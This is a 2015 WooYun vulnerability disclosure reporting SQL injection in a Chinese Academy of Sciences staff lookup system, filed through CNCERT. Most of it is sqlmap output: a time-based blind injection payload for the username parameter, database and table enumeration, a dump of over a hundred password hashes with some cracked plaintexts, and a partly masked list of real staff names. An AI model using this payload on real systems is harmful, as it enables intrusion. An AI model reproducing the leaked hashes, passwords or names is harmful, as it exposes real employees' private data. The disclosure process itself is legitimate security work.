当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156097

漏洞标题:中科院某系统SQL注入可导致全院机关职工密码手机号邮箱等信息泄露

相关厂商:中国科学院

漏洞作者: Paladin1412

提交时间:2015-11-26 17:52

修复时间:2016-01-14 17:28

公开时间:2016-01-14 17:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

中科院的注入好像不少诶

详细说明:

中科院院机关职工查询系统
地址:**.**.**.**/
参数username 存在注入
DBA权限
可获取全院机关职工账号密码手机号邮箱等

漏洞证明:

---
back-end DBMS: MySQL 5.0.12
available databases [6]:
[*] hrcx
[*] information_schema
[*] myexam
[*] mysql
[*] performance_schema
[*] test
---
back-end DBMS: MySQL 5.0.12
Database: hrcx
[13 tables]
+-------------+
| bgqs |
| ctrl_system |
| departmen |
| log |
| menudir |
| rolemenu |
| ry |
| ry0 |
| ry00 |
| ry131113 |
| ry201310 |
| ry201405 |
| zw |
+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))bxSH) AND 'iqCP'='iqCP&passwd=123&x=71&y=5
---
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ctrl_system
[4 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| act | int(5) |
| opratorid | varchar(20) |
| uptime | datetime |
| userlog | int(1) |
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ry
[121 entries]
+---------+-------------------------------------------+
| usernam | passwd |
+---------+-------------------------------------------+
| <blank> | 01F1D8C22B5FDD0FF1AAB9FE29FB5D62 |
| <blank> | 02F4E11EA84665929BAB1534F984EBFC |
| <blank> | 0369DF2B0150F75F75885A2C7E847A2F |
| <blank> | 041548D4AC32CA43BFDC25502BA45188 |
| <blank> | 047CB1E18413350FA1CE7E1B6C58FB6B |
| <blank> | 054962A69062C66A19F4D0B7BFC6D81C |
| <blank> | 06A23AD080EE28D6A68F168A720AA411 |
| <blank> | 06E8B1488A719340007D5458C17448D5 |
| <blank> | 079B1F6068742DD85E866C680EFB6BCA |
| <blank> | 07D4515F6F13AEDD6DCFCD9C8ECB22DF |
| <blank> | 07D56C0E89F0704E835AC9A2F91A617B |
| <blank> | 0878F2CF50A4D9B86CDE1BA11A8FC6F7 |
| <blank> | 09B72CB7505D3A8D2576CCF0A865CE56 |
| <blank> | 0B42CEE072F3B2497BBDA368CE1808AE |
| <blank> | 0C0191723714A2C3D0ABBACC4C751FD5 |
| <blank> | 0CEEBD04B0F772545A38DC6EFE8C5968 |
| <blank> | 0D4F22031F7586D3A0FBB59BDB17774D |
| <blank> | 0D71FAB4F115BD3F985FEA1F869E3050 |
| <blank> | 0D8744337D649993B134F09CC7127215 |
| <blank> | 0DA6526223A8E12E0F8171FD4AFBFF96 (000615) |
| <blank> | 0DB8D08B306F9553858A5183E4E96C41 |
| <blank> | 0E6B852005B045679C28936C3F91219E |
| <blank> | 0EE21FD8B90E50A1063B27501EFBD83B |
| <blank> | 0F6C1ED9784480A9206A404A40D4AB6A |
| <blank> | 1156000E0A09D568FD0851938D453DF7 |
| <blank> | 12057F6A05AF4FEA8B3F726F1C94A44B |
| <blank> | 1217A1D8748F735FA7C28813CFAF382F |
| <blank> | 12329C3BD19A22F747499C981F37B824 |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 1287D41F1EC111F5F1408259817D949B |
| <blank> | 12F015F3775D58F25C0A3C51B933E0B7 |
| <blank> | 13D99843AB1A3F673301BB6C808BD0A3 |
| <blank> | 13DB6B672C1273090C697672F2B26F48 |
| <blank> | 142F9E41AC080F7D1139C258A43DA22F |
| <blank> | 1509C981B0E4093E0A23A26680E7E066 |
| <blank> | 1563277E3B47FF950B2482B934D4DAF5 |
| <blank> | 15B9C535D49783210E51504CEC50905F |
| <blank> | 15BCCD61CD86E65A627095D856868655 |
| <blank> | 15F14A129902847DF223FEDEFA676A94 |
| <blank> | 1676B002DD06BAC8A34BFA3082E3C2F5 |
| <blank> | 18839B74778339542C352C2BAAF54E8C |
| <blank> | 18A983DFCB9F7E3CDF6B97EEEF56BFBC |
| <blank> | 196034D921DB4A69DFC3D6C69C89BBBF |
| <blank> | 1A55BD5B2B43EA5D6CAFE8E650E8B1AF |
| <blank> | 1ADB661DF112CF9D1995B995B5E80B13 |
| <blank> | 1B5B1A17D50CCB470ECF3D480676E95A |
| <blank> | 1BEBF9B286EE152915A3316A0B5F8C92 |
| <blank> | 1CA79EC4987F27B85094A0F6A3EBFB3A |
| <blank> | 1DD2113FBE2689F4A91B787072DAB6F0 |
| <blank> | 1E0B986B403FED6318858CC78332832E |
| <blank> | 1E5B4C2C5DB82C84183F22E1F9AA71AD |
| <blank> | 1E8ECF9C94AAA739A266B7906634B6AF |
| <blank> | 20FF06A19040A3CE7DBA415F1A088FCE |
| <blank> | 20FFDC00DF7571624723E4D7AFE31B72 |
| <blank> | 2227FA25B208A95A80659A375A75B89E (910724) |
| <blank> | 226219776B829671AF99D5E4BF114C07 |
| <blank> | 24FE7CF6FA1BB7CB956318988FFEE083 |
| <blank> | 256B85CB941D5AE5D4BEDE7F362A2BD1 |
| <blank> | 26505354B94A5356573BA0DE6FD818C2 |
| <blank> | 266346E9B40AEE51557E8E56E0D362F1 |
| <blank> | 27472D0562CB1BBD84C95BCBB77C48B5 |
| <blank> | 28135CF8CF804EDCE2B9B00DB13E0310 |
| <blank> | 282BBB8A4A2EAC5B9072A2E01FF42157 |
| <blank> | 2838EAC5E99AD27B82813233778A30D3 |
| <blank> | 28AF76CBF46B0709FA1F95D9B088B720 |
| <blank> | 2926037354404A4F0D77290DD65C278E |
| <blank> | 296A52EBA9E239FC2930764A658998B6 |
| <blank> | 299C2FC2F77CC46BBA189D65CE8438C2 |
| <blank> | 29A6D57B22625D4885DC773D2CAAAE81 |
| <blank> | 29F2BF721AF1522C86895517433513D8 |
| \x05 | 2AADE1088D6EC2DA5E6A61AB5F10648C |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B88499989E8B6C945A502842F1A0FF4 |
| <blank> | 2B8DE47CA1500FE4B1E7F8A91A4964CB |
| <blank> | 2CBBC8295F02FAAA559E98B1C5014D42 |
| \x02 | 2CE3F4C9A2BDA1841B43198226543E02 |
| <blank> | 2D67E74481480C93B6C705204197E1C7 |
| <blank> | 2E2112F7395568E5F71E09B382AC33D9 |
| <blank> | 2E8237F3DE1492B9AA432A76ACC7A2B8 |
| <blank> | 2EBBDB899C6896ACA8ABDE8743CD7D20 |
| <blank> | 3016D59073BEDA6340ADE41A5BAF71AC |
| <blank> | 3048E628EB8FA77CFA06039CD4772358 |
| <blank> | 331A7DBECA648B633E33B136657770C1 |
| <blank> | 33681FCB93892B7F37F15BFD31130B4D |
| <blank> | 34C59D08F64501FB649F2BDC9165ABC1 |
| <blank> | 34C59D08F64501FB649F2BDC9165ABC1 |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 36F17C3939AC3E7B2FC9396FA8E953EA (qweasd) |
| <blank> | 374EAF12AD40059F1699113B925CBA61 |
| <blank> | 378635CAFA81DAC2F6015D74B8260BB1 |
| <blank> | 37F00FB4E8EF5AB2F52AEDD52AE9C5D6 |
| <blank> | 3A148FB1884539493D9F858354C971DD |
| <blank> | 3C83AAC0CB8FBCF3D41058FBAD579F3E |
| <blank> | 3CC2102A88432C00A0E7C3A4A56E2C0A |
| <blank> | 3CCB86EBBD02A63D3F2A261D0FE6EDCB |
| <blank> | 3D5899B6DBBFBC9A4859FB0B8F6115AE |
| <blank> | 3D8FEB0D501184650DA168FCFE406788 |
| <blank> | 3D9188577CC9BFE9291AC66B5CC872B7 (123465) |
| <blank> | 3D92BE376FAFE5C21430310CD58D38A6 |
| <blank> | 3E21244CFF134F259075A88896E732B6 |
| <blank> | 3E2858F5C64F79A696A1BCEB0EC708C6 |
| <blank> | 3ED5BE72477E00889EEB4BF751531D5D |
| <blank> | 3F06DB47F777320150C63E9FF1D56308 |
| <blank> | 40377ABF95F5B970938E7CFC014EEB7E |
| <blank> | 4155294482F766964E9E42AC197E927B |
| <blank> | 416D3C93C9AA21EBA16CADC7365AF981 |
| <blank> | 416FD889C4095E59F0875FCA0FA36C6B |
| <blank> | 4210C0A8FFE473485D2C5DD736995232 |
+---------+-------------------------------------------+
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
+-------------+---------+
| Table | Entries |
+-------------+---------+
| log | 8974 |
| ry | 468 |
| ry201310 | 452 |
| ry00 | 448 |
| ry131113 | 448 |
| ry0 | 445 |
| ry201405 | 442 |
| departmen | 14 |
| menudir | 6 |
| zw | 5 |
| bgqs | 4 |
| rolemenu | 4 |
| ctrl_system | 1 |
+-------------+---------+
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: hrcx
Table: ry201405
[91 entries]
mask 区域
*****----------+--------+---*****
***** realname | roleid | sf*****
*****----------+--------+---*****
***** 彭颖 | 2 *****
*****^^振龙 | 3 |*****
*****^永强 | 3 | *****
*****^^青怡 | 3 |*****
*****^^红娟 | 3 |*****
***** 陈琼 | 3 *****
***** 罗雯 | 3 *****
*****^^芳芳 | 3 |*****
***** 周鼐 | 3 *****
***** 张燕 | 2 *****
*****^^玲俐 | 2 |*****
*****^^维佐 | 3 |*****
*****^^胜先 | 3 |*****
*****^^玲媛 | 3 |*****
***** 刘杰 | 3 *****
***** 李杰 | 3 *****
***** 刘毅 | 3 *****
*****^^建基 | 3 |*****
***** 董麒 | 3 *****
*****^^良强 | 3 |*****
***** 燕琳 | 3 *****
*****^^明辉 | 3 |*****
*****^^伟伟 | 3 |*****
*****^^子龙 | 3 |*****
*****^^京生 | 3 |*****
*****^^文清 | 3 |*****
*****^^京华 | 3 |*****
*****^^昊泉 | 3 |*****
***** 马扬 | 3 *****
***** | 潘教峰 | 3 *****
*****^^一琪 | 3 |*****
***** 王宁 | 3 *****
*****^^令波 | 3 |*****
*****^^贾娟 | 3 |*****
*****^^晓风 | 3 |*****
*****^^光锋 | 3 |*****
***** 赵涛 | 3 *****
*****^^颖虹 | 3 |*****
*****| 易志军 | 3 *****
*****^^博伦 | 3 |*****
*****^^小东 | 3 |*****
***** 刘黎 | 3 *****
*****^^荣铉 | 3 |*****
*****^^英杰 | 3 |*****
*****^^显杰 | 3 |*****
*****^^启治 | 3 |*****
*****^^丽霞 | 3 |*****
*****^^骏平 | 3 |*****
*****^^亚东 | 3 |*****
***** 田原 | 2 *****
***** 冯霞 | 3 *****
***** 尹叶 | 3 *****
***** 刘珊 | 3 *****
*****^^桂强 | 3 |*****
*****^^承会 | 3 |*****
***** 王健 | 3 *****
*****^^凤霞 | 3 |*****
***** 房晖 | 3 *****
*****^^晓明 | 3 |*****
***** 王菲 | 3 *****
***** 唐清 | 3 *****
*****^^书林 | 3 |*****
*****^^建军 | 3 |*****
*****^^永生 | 3 |*****
*****^^晓莉 | 3 |*****
*****^^燕华 | 3 |*****
***** 郝帅 | 3 *****
*****^^晴晴 | 3 |*****
***** 盛夏 | 3 *****
***** 冯剑 | 3 *****
*****^^俊梅 | 3 |*****
*****^^克强 | 3 |*****
***** 陶诚 | 3 *****
***** 严枫 | 3 *****
*****^^伟刚 | 3 |*****
***** 吕远 | 3 *****
*****^^广义 | 3 |*****
***** 杨辉 | 3 *****
*****^^鹏飞 | 3 |*****
***** 李静 | 3 *****
*****^^连清 | 2 |*****
***** 李定 | 3 *****
***** 李强 | 3 *****
***** 杨萍 | 3 *****
***** 王希 | 3 *****
***** | 谭铁牛 | 3 *****
***** 柳岸 | 3 *****
***** 冯越 | 3 *****
***** 苗鸿 | 3 *****
***** 田天 | 3 *****
*****^^龙新 | 3 |*****
*****-+----------+--------+*****

修复方案:

过滤

版权声明:转载请注明来源 Paladin1412@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-30 17:27

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT向其上级管理单位通报,由其后续协调网站管理单位处置。

最新状态:

暂无